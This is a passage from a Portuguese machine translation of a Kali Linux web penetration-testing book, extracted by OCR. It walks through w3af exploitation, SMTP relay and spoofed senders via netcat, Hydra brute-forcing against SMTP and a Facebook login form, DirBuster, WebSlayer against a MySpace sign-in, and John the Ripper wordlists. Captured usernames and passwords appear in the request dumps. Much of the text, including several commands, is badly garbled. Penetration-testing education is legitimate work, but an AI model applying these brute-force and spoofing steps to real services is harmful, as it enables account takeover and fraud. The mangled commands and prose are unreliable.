criado na coluna da esquerda. Se você estiver usando um novo perfil ou editar um já existente 
perfil, você pode marcar a caixa para qualquer plugins que deseja verificar. Quanto mais plugins 
você verificar, quanto mais tempo a digitalização vai demorar. w3af irá avisá-lo de possíveis atrasos 
se você verificar um grande grupo. Clique em Começo para executar a verificação. 


The Open Web Application Security Project (OWASP) is 


a worldwide free and open community focused on 


improving the security of application software. OWASP 
searched for and published the ten most common 
security flaws. This profile search for this top 10 
security flaws. For more information about the security 
flaws: nttp://www.owasp.org/index.pnp/ 

OWASP. Top-Ten. Project, 


Em seguida, digite a URL de destino no Target: campo e clique em Começo para executar a 
verificação. O 
seguinte imagem mostra criação de w3af para escanear www.thesecurityblogger.com: 


Scan cong | 


Profiles http: www. theseounty blogger com 

empty profie r OOPP 

OWASP_TOP10 — TE 

auckt high rsk sh 
es + auth 

niente + bruteforce 

fast scan 

Fu quit 

full audit marusl disi 

sitemap 


web infrastructure 


Pugn Active 


+ output @ 


Mangle plugins modify requests on the fy. 
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w3af mostrará o status de uma varredura ativa no Log janela. w3af tentará 
predizer o período de tempo necessário para completar a análise. 


| Q sesch 
Fa 26 Agr 2013 03:32:41 AM EDT] A comment wiih the sinag "waming” was found in: “httpwawthesecuntytlogge. com”. Ths could be “ 
heresting. Tres aformation was found m the request with id 1 
Pel 26 Agr 2013 03:32:41 AM EDT] A comment wath the strieg “pues” was found in. “Tet pyywawshesecunitytioggec com”. This could De imeresting 
ds information was found in the request with id 1 
Pä 26 Apr 2013 03:32:41 AM EDT] A comment with the strieg “coma” war foued in: "Aip pwan thesecurityblogger. com, Tres could be teresting 
às information was found in the request witħhig 1 
EF 26 Agr 2013 03:32:41 AM EDT] A comment with the strieg “security” was found in: “hitpwwwthesecuritytiogger. com”. This coukl te 
eresting, This formation was found in tee request with id 1 
Pi 26 Apt 2013 03:32:41 AM CDT] A comment with The strieg “Captcha” was found mr "upra Dre secar my liar com”, Ths could be 
heresteg, Ths eformation was found in the request with ad 1 
Fm 26 Apr 2013 07:3243 AM EDT| The uri parameter of xUrlib POSTO must be of vei Parser urt_obpect type 
For 26 Apr 2013 03:32:33 AM EDT| The ur parameter of xUrilibPOSTT) must be of uriParsecurt_otyect type 
Fa 26 Apr 2013 03:32:41 AM EDT] wenttff plugni: You have to configure the local and remote cirectory to compare. 


Rurving discovery fingerPKS on MeIpwew,thesecunitytiogger com | Method: GET. 


Para ver os resultados de uma varredura, clique no Resultados guia. Resultados proporcionara o 
foram identificados os detalhes do que possivel vulnerabilidades. O Explorar guia vai mostrar 
as possiveis exploits baseados nas vulnerabilidades descobertas. 


The remote wed server sent he HTTP nesder “lnk” with value: *<Petpul 
. Wome lifwo>, ré=shortimk”. Ths information was found im the request with id 1 


O HTML commen with “user inside 
O HTML coemenera with “pass” lasice Pequest nesporne 
O HTML comment with "fix" inside Raw Headers 


O HTML comment with “hack” inside t- — E === 


y POST nttp ri Fewn tresecurstyb logger . ton HTTR/1.1 
© HTML comment with “warnng” inside | Host: www. thesecurityblogger.cce 
O HTML comenert with "puta" inside Contest-Type: applications x-wa-forn-urlencoded 
O HTML comment with "email" inside Accept-Encoding: gzip 
ri | Accept: */* 
O HTML comment with "security" inside | User-Agent: Mozilla’4.8 (compatable; MSIE 8.6; Windows NT 6.1 
O HTML commer with “captcha” made | Trident /4.0; waat.sf.net) 


srangeParaneters (a) 
srangetscaders 41) 
- StrarqeHoacers 421 


02 5uF F-208256 FF eR IS UFPA FEI SUF Fan DSP FAS frias Kg FreRBTe Jd! 


O Sange reader 


= clichgackirag ( i i diti, 
3J  cickpcking (1 fo Em dios 
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w3af permite aos usuários explorar vulnerabilidades identificadas durante a fase de auditoria. Como 
vulnerabilidades são encontrados, eles são armazenados em locais específicos da base de 
conhecimento, 

a partir da qual explorar plugins podem ler e usar essa informação para explorar o 

vulnerabilidade. Se a exploração for bem sucedido, você vai ter um shell no sistema de destino. O 
imagem seguinte mostra www .ntew3af explorando a dayShell vulnerabilidade em 

www thesecurityblogger.com. 


Scan config Log Results Exploit 
Exploits Vulnerabilities 
‘davshell A Unhandled error in web application 


eval A UNG er Bei ta 
- Multiple Exploit! 
fleuploadShell AME FZ USE me Sat COMM ano TO enter Me Vales yoorser, ano 
localFileReader then exploit it using fastExploit 
osCommandingshell No [blind] SO! injection vulnerabilities have been found 

, - Hint #1: Try to find vulnerabilities using the audit plugins 
remoteFileinciudeshell Hint #2: Use the set command to enter the values yourself, and 
rfiProxy then exploit it using fastExploit 
No [blind] SOL injection vulnerabilities have been found 
Hint #1: Try to find vulnerabilities using the audit plugins 
sgimap Hint #2: Use the set command to enter the values yourself, and 
xpath then exploit it using fastExploit 


sql webshell 


Exploiting 'davShell 


Há um monte mais recursos úteis no conjunto de ferramentas w3af. Você pode aprender mais 
em 
http://w3af.org/. 


Explorando os sistemas de e-mail 


Por natureza, todos os sistemas de e-mail sentar na Internet e permitem externo anônimo 
acesso do mundo exterior, a fim de ser produtivo. Usuários em muitas organizações 

enviar informações confidenciais por e-mail. Na maioria dos ambientes, os servidores de e-mail 
manter 

informações valiosas tornando-se um alvo de alta prioridade para os atacantes. A boa 

notícia para os consumidores é que os sistemas de e-mail configuradas corretamente modernos são 
extremamente 

difícil de explorar. Isso não significa que os sistemas de e-mail não são vulneráveis a ataques 
pois a maioria dos sistemas de e-mail têm aplicações web e são acessadas através de um web 
interface. Isto promove a possibilidade de um intruso acesso remoto a um núcleo 

sistema que poderia ser aproveitado como um ponto a outros sistemas internos. 
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Antes de atingir os servidores de correio, é importante saber o que os sistemas estão hospedando o 
servidores de correio. Se você não tiver essa informação, você pode usar o Reconhecimento 
técnicas que aprendemos em Capítulo 2, de reconhecimento. Neste exemplo, foi utilizado 

feroz para determinar os hosts MX para um domínio particular. Na maioria dos casos, o MX 

host é o servidor SMTP. A tela a seguir está sendo executado Feroz em 

www.cloudcentrics.com: 


5 Www.cLoudcentrics.can 


ot all 
Not all 
transfer Ait, was worth! a shot) 


jood old fashioned way... brute farce 
t or the-defad be wordlist 


Primeiro, precisamos ver se o servidor de correio eletrônico é vulnerável a comandos diretos. A 
principal 

finalidade para a qual a maioria dos atacantes querem explorar servidores de correio é para 
falsificar e-mails 

e utilizar o servidor de e-mail como um servidor de retransmissão de e-mail não autorizado. Este 
livro vai 


brir mais sobre como comprometida e-mail servidores podem ser usados par a engenharia, A 
exemplo, usaremos Netcat como a ferramenta para se conectar ao servidor de Correio. Netcat é 


UM eurico des f de sem ag (gS para deitura e.gravacao para Conexões de rede 

dadia tap zap Hi: nge araos dE ai para ser um dispositivo confiável "back-end", que 

pode ser usado diretamente ou facilmente conduzida por outros programas e scripts. Netcat é 
também 

uma depuração e investigação ferramenta de rede rica em recursos com a capacidade de produzir 
quase qualquer tipo de correlação usando um número de capacidades embutidas. 


Um método comum para lançar Netcat está emitindo o comando netcat correio-servidor 

port. Neste exemplo, o nosso alvo servidor de correio está em execução servidores pela porta 25. 
Nós 

verificado esta informação usando nmap durante os passos de reconhecimento descrito 

em Capítulo 2, de reconhecimento. 


:=# netcat mail.secmob.net 25 


Uma vez que se conectar ao servidor usando Netcat, usamos o HELO comando para informar o 
que servidor que somos. 
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Se recebermos uma resposta, podemos manipular a maioria dos servidores usando os comandos 
SMTP 

(Alguns sistemas podem não ser vulnerável com base na configuração e tipo de sistema). No 
seguinte exemplo, começar por dizer ao servidor que estamos usando o HELO comando. 

Em seguida, podemos usar o servidor de email para retransmitir mensagens para futuros ataques do 


Reose chet DA,Para RCP, E Dados são os únicos campos obrigatórios. Você pode usar outro 
campos para esconder que o e-mail está sendo enviado para e mudar a responder endereço. Uma 
exemplo é mudando a Responder para tratar com o objetivo de enganar um receptor em 


enviando um e-mail para outra pessoa. 


“AIL FROM: soneone_inportant@cloudcentrics.con 


A lista completa dos comandos SMTP podem ser encontrados através dos comandos SMTP RFC 
ou usando o Google. 


Ataques de força bruta 


Um ataque de força bruta é quando todas as chaves possíveis são verificadas em relação aos dados 
criptografados até 

a chave correta seja encontrada. Ataques de força bruta são extremamente caros a partir de um 
recurso e 

perspectiva de tempo, porque o atacante está explorando vulnerabilidades no criptografia 

tirando proveito do comprimento da chave e simplicidade da chave. Uma senha é baseado 
frequentemente 

em palavras de dicionário ou seja, o espaço total de um invasor teria que testar seria 

todas as palavras em um dicionário de correspondência fazendo o escopo adivinhando 
significativamente menor 

do que uma senha com caracteres aleatórios. Melhores práticas para reduzir os ataques de força bruta 
está usando chaves longas e complicadas, bem como tempos de espera após um número de 


ivas e 
ENO Ae todos para adicionar mais fatores de segurança. 
Hidra é uma ferramenta desenvolvida pela Escolha do Hacker (THC) que usa a força bruta 
método de ataque para testar contra uma variedade de protocolos diferentes. E ideal para atacar 
sistemas de e-mail porque Hydra pode direcionar um IP e protocolo específico, como o administrador 
conta para POP3 e SMTP utilizado pelos sistemas de e-mail. 


Antes do lançamento de Hydra, você deve executar Reconnaissance em um alvo, como um 
sistema de correio. Capítulo 2, o reconhecimento, cobre uma ferramenta de avaliação de 
vulnerabilidades Zenmap 

que pode ser usado para coletar as seguintes informações para Hydra: 


e | O endereço IP do alvo (por exemplo, 192.168.1.1) 

* Portas abertas (por exemplo, a porta 80 ou 25) 

e Protocol (por exemplo, HTTP para web ou SMTP para o correio) 
e Nome de usuário (por exemplo, admin) 
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Outra ferramenta de reconhecimento que muitas vezes é usado com Hydra é o plugin do Firefox 
Dados adulteração. 


ADD-ONS 


NTENSCS | Tepes «CML ERTS 


toscte © Lotação is 


« Tamper Data s 
by Ad ' 


Use tamperdata to view and modify HTTP/HTTPS headers and post parameters... 


Meet the Developer: Adam Judson 
Lowes why Tamper Data was created aed Aad oot whats mog for hb aidan 


Tamper Data é uma ferramenta escrita por Adam Judson que permite que um atacante para ver HTTP 
e HTTPS GET e POST informações. Esta informação é útil ao usar ferramentas 

tais como Hydra força-bruta formulários da web, pois você pode automatizar Hydra na abertura 

a página da Web e testar as diferentes combinações de nome de usuário e senha. 


Uma vez que habilitar o plugin Tamper Data, podemos lançar o plugin e iniciá-lo 
antes de apresentar um nome em um formulário web. 


~ Consent 
éf u Peceockcae = Bs 


D Mom ites Cote stawa Tins Gree é Oma Vem F o Dau Heg acer ns O The saciar Acacerty vegas 


Sign Up 
Connect with friends and the ts tres and always WE be 
world around you on Facebook. 


+ Tamper Date - Ongoing requests 
Soo Tereper Chegar 


© prio e Mir wee ao com comp ção Mago Miere! «| 


* Comme Taper 


luo seni SLET 


No 
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Tamper Data irá exibir as informações inseridas nos grupos de campo. Os atacantes podem 
manipular e reenviar os dados, mesmo que o site é criptografado. 


https,//secure wwtcom/nidp/sami2/sso?sid=0 


Request Header Na... Request Hea Post Parameter Na... Post Paramet... 


Host secure.wwicor option credential 
User-Agent Mozilla/5.0 (W Ecom User ID 
text/html apol Ecom Password 
en-US eng =), loginButtond 
gzip, deflate 
hitps://seoure.s 


ISESSIONID=3 


Neste exemplo, vemos que o nome de usuário rosa ea senha pinkprincess são 
utilizado quando o login botão foi submetido. 


Ambos os exemplos são duas maneiras práticas para a realização de reconhecimento em um alvo 
para 

reunir as informações úteis Hydra irá precisar. Há uma abundância de outros métodos 

e built-in ferramentas de Kali para coletar informações na web para usar em Hydra, no entanto, que 
recomendar Netcat e Tamper Data como os métodos mais eficazes. 


Agora que completamos nossa fase de reconhecimento, vamos lançar Hydra e 
ver como podemos usar nossa informação Reconnaissance para realizar uma força bruta 
ataque de senha. 


Para acessar Hydra do Kali, ir para Ataques senha |Ataques online e selecione 
Hydra. Isto irá abrir uma Terminal janela que irá executar automaticamente, Hydra. 


joe 197)168.9.J 
p defaultpw >S 1192. 165810.1 imap PLAIN 
txt http -pr TSE 8 À 
5 pop3s://[F 2c:31ff;fel2:acll]:143/DIGEST-MDS 
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A documentação de abertura explica como executar Hydra. Por exemplo, se você quiser 

para atacar arquivo de senhas de uma conta de administrador localizado na 192.168.1.1 usando 
SMTP, 

você deverá digitar: 


hidra-l admin-p / root / password.txt 192.168.1.1 smtp 


Se você gostaria de usar Hydra em um formulário web, teremos de reunir o 
informações foram coletadas a partir do plug-in de dados adulteração. A sintaxe para usar Hydra 
em um formulário web é <url>: <form parameters>: <failure cadeia>. 


URL = https://www.facebook.com/login.php?login_attempt=1email=pink&passw 
d = pinkprincessl & login = "log in" 


Você pode então executar Hydra. Você terá de fornecer um arquivo que contém uma lista de 
nomes de usuário e um arquivo que contém as senhas. 


hidra-L / cloudcentrics / usernamelist-P / cloudcentrics / passwords demo | 
file.txtt-facebook.com http-get-forma "login.php login attempt = 1: nome de usuário 
=^^ & EMAIL TOKEN =^ ^ & SENHA login = Login: incorreto " 


A sintaxe pode ser complicado e mudar de site para site. Isto pode acontecer no 
mesmo site também. E recomendado para dominar Tamper Data e Hydra em um laboratório antes 
para apresentar ao vivo Teste de Invasão. 


DirBuster 


DirBuster é projetado para diretórios e nomes de arquivos de força bruta contra aplicações web 
servidores. É comum que os servidores web apresentam-se como uma instalação padrão 
estaduais, no entanto aplicações e páginas são realmente escondido dentro. DirBuster é 
projetado para procurar esses fatores escondidos. 


DirBuster pode ser encontrado em Aplicações Web |Crawlers Web como dirbuster. Uma vez 

abriu, há campos que devem ser preenchidos antes de iniciar um ataque. No 

menos importante, você deve digitar uma URL de destino, selecione o número de threads (sugerimos 
estourar o limite 

isso a 100), ea lista de arquivos. Você pode clicar em Procurar e selecionar a lista padrão 

ou desenvolver o seu próprio. 
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Note-se que algumas versões de Kali não pode incluir os dicionários padrão. 
Você pode baixar os dicionários padrão on-line e apontar para DirBuster 
los como mostrado no exemplo a seguir: 


OWASP DirBuster 1,O-RC1 = Web Application Brute Forcing 


Fle Options About Help 


Target URL (eg Hetpulesample, com S9 


htt www. thesacuntybizagar. com 


work Method Use GET requests onl) “=| Auto Switch (HEAD and GET! 


Number Of Tiveads z £3 100 Thre. | Go Faster 


Select scanning type "List based bite forca Pura Brute Force 
Fie wth list of drafies 


froctDesktopwordist. ist à Browse || O Ust Inta 


Select starting options *) Standard start point URL Fuzz 


* Erute Force Dirs ~ Be Recursive Dr to startwth | 


+! Brute Forca Alas Use Blank Extension File extension pre 


Bent | 


Plaase complete the test details 


Depois de preencher as informações básicas, clique em Começo e DirBuster irá iniciar o 
avaliação de vulnerabilidade. Muito provavelmente, ele vai afirmar que o tempo de conclusão é um 
pouco 

dias, no entanto, normalmente você vai encontrar informações úteis dentro de minutos. A 
sequência 

Screenshot i ifi gi-bin : derta-serntere 


MA ppiication Brute Forcing 


Fie Options abas Help 


http: wes, thesecurtyolo goar. com: BO 

O scenirtormmaten Rèsuits -List ew: Drs: 565 Files Ô Results - Tree View A Errors 3 

Type Found Response 

Dir fstats/ 201 
Dir fwp-corterki 200 
Dir j 200 
Cir fogt-bry 403 
Dir (20051 S03 
Dir fwpinciucdes! 200 
Dir No, 503 
Dir fatemapy $03 
Dir fel 503 
Dir $03 
Dir 03 
Dir roS 503 
Dir fevents/ $03 


Dir fkawoor 303 
Currert spes 275 requestsisar (Select and night cick for more options) 
Average speed: IT) 135, (C1191 requastsfsec 


Parse Queue Size O 
Total Requests: 2970023545 24535 


Current number of running threads: 190 


Change 
Time To Finish: 14 Gays 


N Pause 


Starting drie bet based brute forcing Aderttwl3 pho 
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Qualquer código que não seja 404 está aberta a força bruta. Para direcionar o / CBl-bin / dobrador 
encontrado durante a pesquisa, clique em Pare para acabar com a digitalização e clique em Voltar. Na 
página 

painel, acima Comece, é um campo para a escolha do ponto de partida a vulnerabilidade 

avaliação. Para iniciar o interior do / CBl-bin / pasta, coloque o texto nesse campo e clique 

em Iniciar. 


Dir to start wth /eqgi-binJ 


Fila extension php 


Provavelmente, você vai encontrar mais pastas dentro de pastas para avaliar. Continue o 
mesmo processo de parar, atualizar o campo de início e execução de exames para mapear 
o seu alvo. A figura a seguir mostra uma árvore de mapeamento para o 

cgi-bin pasta: 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 


File Options About Help 


mtputemw thesecurityblagger, com:BD/cgi-bin/ 


O Scan Information ` Results - List View: Dirs: BLS Files: B27 | Results - Tree View \ A Errors: 30 |, 

Type Found | Response Sie | 
Dir tegibin 403 SOS e 
Dir fegiDinfarticle/ 503 541 
Dir fcgibin’special/ 503 54] 
Dir fegibirisupport/ 503 54l 
Dir fcgi-birvog 503 4 
Dir fegidinlogin/ 503 541 
Dir fegi-binf2004/ 503 S41 
Dir fcgi-binj1B/ 503 541 
Dir fcgibinhelp/ 503 S41 
Dir fegi-dir/sp/ 503 S41 
Dir tegrbinfprofile/ 503 S41 
Dir tegibingpolicies/ 503 S41) 
Dir tegi-binimore/ 503 S41 
Current speed; 134 requests/sec (Select and right click for more options) 
Average speed: (T) 43, (C) 87 requests/sec 


| 


Parse Queue Size: 0 Current number of running threads: 100 
Total Requests: 2928/337606829 Change | 


Time To Finish: 44 Days 


@Back || TI Pause | Report | 


DirBuster Stopped fcgi-biny201/ 
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Você pode clicar no Relatório botão para gerar um relatório de suas descobertas. Você precisa 
escolha onde deseja salvar o relatório e clique em Gerar relatório. Um arquivo de texto irá aparecer 
mostrando o que foi encontrado. 


DirBuster 1.0-RC1 Report Viewer 


froot/Desktop/UirBusterReport-www thesecuntyblo gger.com-s0.txt 


Full Text) Simple List \ XML \ CSV! 

DirBuster 1.0-AC1 - Report 
httpuldwww.owasp, org/index. php/Category:OWASP DirBuster Project 
Report produced on Thu May 09 15:28:10 EDT 2013 


http: wea. thesecuntyblogger.com:80 
Directories found during testing: 
Dirs found with a 403 response: 


icgibiné 
icgi-pin/test/ 


Dirs found with a 503 response: 


icalbinfeatures/ 
icaibinipage/ 
icgibinis/ 
icgitinf22s 
icgitbin/docs/ 
icgi-in/20/ 
icgidin/downloads/ 
iegi-binfas 
icgitbinfmains 


% Close | 


WebSlayer 


WebSlayer é uma ferramenta de força bruta aplicação web. WebSlayer pode ser utilizado para- 
bruta 

forçar o Form (usuário / senha),GET, E POST parâmetros. WebSlayer também pode 

ser usado para identificar os recursos não vinculados, como scripts, arquivos, diretórios e assim por 
diante. 

WebSlayer tem um gerador de carga e os resultados do analisador. 
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No Configuração de Ataque separador existe uma url campo, que deve ser preenchido com o 
objectivo 

URI. Abaixo do campo de URL são o Cabeçalhos e POST campos de entrada de dados. Tem 
uma opção para definir o tipo de carga, que pode ser Dicionário,AlcanceOu Carga paga. 

O Dicionário pode ser um arquivo contendo cargas, o que pode ser um arquivo personalizado 

ou selecionados de uma lista de dicionários disponíveis. O Alcance configuração pode ser usada 
para 

especificar o intervalo para o ataque. O Carga paga configuração pode importar uma carga útil do 
Gerador Payload guia. A figura a seguir mostra WebSlayer alvo www. 

thesecurityblogger.com: 


* WebSlayer 


J Attack setup |© payload generator Attack results gy Requeste® O Encoder = Logs 


a Help 
vwww. thesecurity blogger comFuzZz 


User Agent: Mozilla/5,0 (VAndows; U, Windows NT 5.1: en-US; nel$b3) Gecko/2008020514 Firefox/3.063 


Payload type: Dictionary + npect in all parameters: Headers wthentecatiom | basic ’ 


Dictionary : | Injections/TWaversal txt `| IR Emcoding FUZZ mes 


Dicoonary 2: | vulnsysqt_iry tet X Encading FUZIZ nomi encodes 


Fikering Discovery options Connection options 
Threads: | 5 = Time delay 


Proxy Anonymous browsing 


O gerador de carga útil é uma ferramenta que você pode usar para criar cargas feitas sob 
encomenda. Você 

pode carregar dicionários, intervalos numéricos, blocos de caracteres, permutações, cartões de 
crédito, 

nomes de usuário e outras configurações. Você pode concatenar e criar uma carga final que 


OAT REARS WARE RAB ASUS SARAH BARRA EAFA ABA UR Bode ser visto 


na imagem seguinte. O exemplo mostra a configuração da carga da gama Opara 

1000. Uma vez que o intervalo é selecionado, clicamos no adicionar gerador botão, que será 
gerar um gerador temporal. Arraste o gerador recém-criado para a Carga paga 

Criador na parte inferior e clique em Gerar Payload. Agora podemos importar o novo 

carga no Configuração de Ataque guia. 
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WebSlayer 


or Attack setup 9 Payload generator "Attack results g- RequesteR 


l e Range a ck Rem m Cree ir Ti Tempore’ Generators 
u — AL Oaia 


Range: 
O Fix wkith 
@ Ads generator 


You can make numeric payloads: 


Example from 0 to 31, 
Or with fixed width from DOO to 031 


| @ Drop generator 
E s ; D Add from file 


=] Save Payload 


Payload Creator Payload Modifier 


O Do Payload 
6 Generate PAYLOAD | L - 


Pattern: [@PRangeo0w] | 
a o O Deste selection 


Depois de importar o payload para o cenário de ataque ou selecionando dicionários padrão, 
você deve selecionar onde a carga será injetado por WebSlayer. Colocar a palavra-chave 
FUZZ no URL ser atacado faz isso. Por exemplo, a tela a seguir 


mostra o alvo http://www.thesecurityblogger.com/FUZZ no campo URI ataque 
onde FUZZ é um ataque aproveitando dois dicionários existentes encontrados em WebSlayer: 


Moved Permanently 


The document has moved here 


q Emh 


Attock firished OK 
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WebSlayer pode atacar qualquer parte do pedido HTTP como cabeçalhos e 

autenticação. Para WebSlayer a força-bruta a senha de um web 

servidor, é importante conhecer o nome de usuário ou, mais provavelmente não vai WebSlayer 
trabalho. Você terá que capturar solicitações HTTP e tentar um login para que você 

pode pegar o agente de usuário e conteúdo necessário para o ataque. 


Live HTTP Headers 


by Daniel Savard, Nikolas Conkouma 


View HTTP headers ofa page and while browsing. 


Firefox oferece um plugin chamado Viva cabeçalhos HTTP, que você pode usar para reunir esta 
informações durante a tentativa de um login para o servidor de destino. O exemplo a seguir 

mostra de usuário joeymuniz usando uma senha incorreta durante a captura de pacotes com ao vivo 
Cabeçalhos HTTP. 


Live HTTP headers 
| He der! 7] Generator Config About | 


HTTP Headers 
User-Agest: Mozilla/5.0 (Macintosh. Intel Mac OS X 10.5, rv:20.0} Gecko /20100101 Firefox/20.0 
Accept */* 
Accept Language: en-LUS,en;q =0.5 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-fonn-urkencoded; charset=UTF-8 
Hash: MzFhMOgwiWZ] Zh ¥mUIZADinnCgl /DgyAcWOOswost ns 3IDrHsywEnCs PWS BAUS gr QEXHMe Ks MOMw7v Oh MhyWwoHCvEKiwe6.. 
X-Requested -With: XMLintoRequest 
Referer: https:/ /mew.myspace.com/ signin 
Contemt-Lengtir 80 
Cookie: MSCulture=|P+68 33.192.1268PCuityro =en- USSPretemredCultare =en-US&PreferredCuiturePending =8Coustrys VV =&Farcede 
Connection: keep-alive 
Pragma: no-cache 
Cache-Control: mo-cache 
emailsjceyrunizâgassward «happy cyjoySpageld =21CIJaDe7-a102 -495-DI22-L132h8]a60ec 


vi Capture 


orgot password | Stay sgned in 
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As partes importantes de informações capturadas a partir do Live HTTP Headers 
utilizado em WebSlayer são o User-Agent e Dados de Acesso como mostrado na 
seguinte exemplos: 


Live HTTP headers 


| Headers | Generator Config About 


HTTP Headers 


POST /ajax/account/signin MITTP/ 1.1 

Host. new.myspace.com 

User-Agerit: Mozilla/5.0 (Macintosh; intel Mac OS X 10.8; rv:20.0) Gecko/ 20100101 Firefox/ 20.0 
Accept */* 

Accept-Language: en-US en,g=0,5 

Accept-Encoding: gzip, deflate 


Generator Config About | 


HTTP Headers 
Accept-Encoding: gzip, deflate 
Content-Type: application /x~eww-form-urlencoded,; charset= UTF-S 
Hash: MzFn¥DoaMWw7ZjZ)Bh¥ mU3ZAfDinnCgl /DayAeWGQswosC nIIDNHEYWEnCs PU WS BW dor QexHwe)CsMOKw7 VCN ywoHCVS K ZWS 
X- Requested Wah. XMLHitpRequest 
Referer hios (nem mysoate.com) signin 
Content-Length: 80 
Cookie: MSCuhure<=06.35.192.1264Culture=en-USGPreferredtulture=en-USS*referredCuhurePending =GCountry=VWM =GForcedE... 
Connection: keep- alve 
Pragma: no-cache 
Cache-Control: no-cache 


emala peymunizãpasswordahappyjovjoyðpæagel sic Salle 2-01 02-499f-5322-leh2 bf] afee 


HTTP/L.1 401 Unauthorized 
Vary: Accept-Encoding 
Set-Cookie: visit_id=403fe? 38-3¢c9f -Abcd -8496- $88/D3Z1014f. dornden= myspace.com, path=/. expires=Tue. 30 Apr 2013 15.27 40 


ee ee leni annin 


Save Ad. | Replay Capture 


As informações do agente de usuário iria na seção de cabeçalhos e informações de login 
iria na seção de dados de postagem. A URL deve corresponder à página de login. O 
Autenticação seção apresenta diferentes níveis de segurança e um espaço para 

o nome de usuário. 
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O exemplo a seguir mostra a tomar as informações de login capturados em HTTP ao vivo 
Cabeçalhos durante a tentativa de acesso myspace. A senha errada é comutada para 

a palavra-chave FUZZ para que WebSlayer sabe onde para tentar a força bruta. O 

Autenticação guia tem diferentes opções de segurança para o exemplo, a autenticação 

está definido como básico com o nome de usuário joeymuniz seguido por uma palavra-chave FUZZ. 


“ WebSlayer 


à Attack setup | Payload generator Attack results y. RequesteR 


Uri: | nttps:/inew.myspace.com/signin 


User-Agent: Mozilia/S.0 (Maontosh, Intef Mac OS X 10 3€CK 0/20100101 Firefox/20.0 


Payload type: | Dictionary | Inject in all parameters: Headers v| Authenticaton: | basic 


Dictionary © [None “ j j Encoding FUZZ None 


Dictionary 2º None Encoding FUZ2Z himi encoder 


Filtering Discovery options Connection opoons 


Threads: | 5 |” Time delay 


Proxy: Anonymous browsi 


Você basicamente de entrada do site, agente de usuário, conteúdo e nome de usuário conhecido. 
Você 

adicionar a palavra-chave FUZZ onde as senhas são necessárias e selecione um dicionário para 
brute-force esses espaços de login. Esta é uma maneira fácil de automatizar a força bruta contra 
um servidor web. 


myspace usa a autenticação mais forte do que o exemplo fornecido. 


Alvos com recursos de segurança como bloqueio da conta, provavelmente, não será 

vulneráveis a esta ferramenta. Ferramentas de segurança avançadas, como a tecnologia IPS / IDS 
faria 

provavelmente será alertado se o seu alvo fosse um bem monitorado. Por estas razões, nós 
cautela contra o uso de WebSlayer em alvos vivos sem fazer Reconnaissance adequada. 
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WebSlayer oferece a capacidade de exportar cargas e descobertas no texto e HTML 
formatos. O arquivo de log também pode ser capturado e colado em um arquivo de texto. 


Analysis for: https://new.myspace.com/signin 


Analysis date: 2013-04-29 23:53:40 


Code |#Lines [#Words [Ur] 

200 |648L tania http://www. thesecurityblogger.com/?Publisher = 
200 [648L [13545W [ht r 

O ST TR t blk " 

200 |648L |13545W http;/iwwy thesecuritybloggercom/?wp-stop-ver= 
200 |648L [13545W huip./rwiw. thesecurtivblogger.com/?wb-slart-ver= 
200 |648L [13545W funny thes ec ogger.com/?wp-uncheckout= 
200 [648L [13545W /htip.//www.thesecurityblogger.com/?wp-usr-prop= 
301 |7L 20W http:/ liwww.theser urityble agger.com/c gi hin 

200 |648L [13545W hiips/w com/?wp-ver-< 

200 (6481. [13545W hitp:fimene thesacuciiyhlogger. com/?yep-yer-info= 
200 |648L (13545W http//www. thesecurityblogger com wp-verlfv-link= 


Webslayer an OWASP Project 


Cracking senhas 


As senhas são os usuarios mais comuns de métodos de autenticação para verificar sistemas. Ele 
E comum identificar senhas que podem acessar outros sistemas, enquanto explorando uma 
sistema de destino. Capítulo 4, os ataques do lado do cliente, fornece uma secção dedicada a 
rachaduras 

senhas com muitas ferramentas disponíveis na Kali. A próxima seção irá abordar 

rachaduras senhas apresentando uma ferramenta muito popular disponível em Kali. 


John the Ripper 


John the Ripper é o cracker de senha mais popular que é usado hoje. Tem 

vários mecanismos que permitem quebrar diferentes tipos de senhas, incluindo criptografada 

e senhas hash. John the Ripper tem a capacidade de detectar automaticamente a maioria dos hashes 
e 

senhas criptografadas tornando o processo mais fácil para os testadores de penetração. Atacantes 
Como a ferramenta, porque é muito configurável e pode ser configurado numa variedade de 
diferentes maneiras de acelerar quebra de senha. 


— o: OA 


Ataques do lado do servidor 
John the Ripper funciona da seguinte maneira: 


e As tentativas de cracking de senhas com palavras de dicionário 


e Usa dicionário palavras com caracteres alfanuméricos anexos 
e prefixado 


e Coloca dicionário palavras juntas 
e | Adiciona caracteres alfanuméricos para combinar palavras 
* Executa palavras de dicionário com caracteres especiais misturados 


* Quando tudo mais falhar, as tentativas de força 
bruta 

A melhor prática é atualizar o dicionário padrão. Encontramos a lista de palavras padrão é 
limitado (cerca de 3.115 palavras) e, em muitos casos não vai quebrar senhas comuns. 
Você pode encontrar dicionários através de pesquisa Google. Para verificar o tamanho de uma nova 
lista de palavras, 
abra um terminal e emitir o contagem de palavras comando, uma vez que o arquivo é carregado para o 
pasta ativa. Esse comando é wc -1 FILENAME. 


É comum ter palavras duplicadas quando o download e combinando múltiplas 

palavras listas da Internet. E recomendado para remover duplicatas, bem como qualquer 
maiúsculas letras desde John alterna estilos do caso automaticamente. Um exemplo do 
comando para remover palavras em maiúsculas é: 


tr A-Z a-z <CustomWordFile> AllLowerCaseFile 

Um exemplo do comando para remover duplicatas é: 

sort-u AllLowerCaseFile> NoDuplicatesOrUpperCase 

Verifique a nova contagem de palavras, emitindo o contagem de palavras comando no seu novo 
arquivo: 


wc -1 NoDuplicatesOrUpperCase 


Para abrir o John the Ripper em Kali, ir ao abrigo Ataques senha |Ataques offline e 
selecionar John. Um terminal de linha de comando será aberta. 


man a Johnny é um GUI para John the Ripper. Johnny é coberto em Capítulo 4, 
Ni Ataques do lado do cliente. 


Você pode avaliar a velocidade de João Ripper, digitando john-test para obter uma 
idéia de quão rápido ele será executado. 
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Para usar um arquivo de texto personalizado, como o que se construiu no exemplo anterior 
chamado 

NoDuplicatesOrUpperCase, Você vai precisar para editar a lista de palavras padrão. Isto pode ser 
encontrado editando o arquivo john.conf sob o padrão John the Ripper pasta. Em 

Nesse arquivo, você vai encontrar a lista de palavras que aponta para um padrão passwords .Ist. 


Alterar a lista de arquivos para o nome do seu novo arquivo de lista de palavras. Seguindo o anterior 
exemplo, você poderia alterá-lo para Wordlist = NoDuplicatesOrUpperCase.Ist. O 

novo arquivo de lista de palavras deve estar na pasta especificada no john.conf arquivo. O padrão é 
listado sob o $ JOHN diretório. 


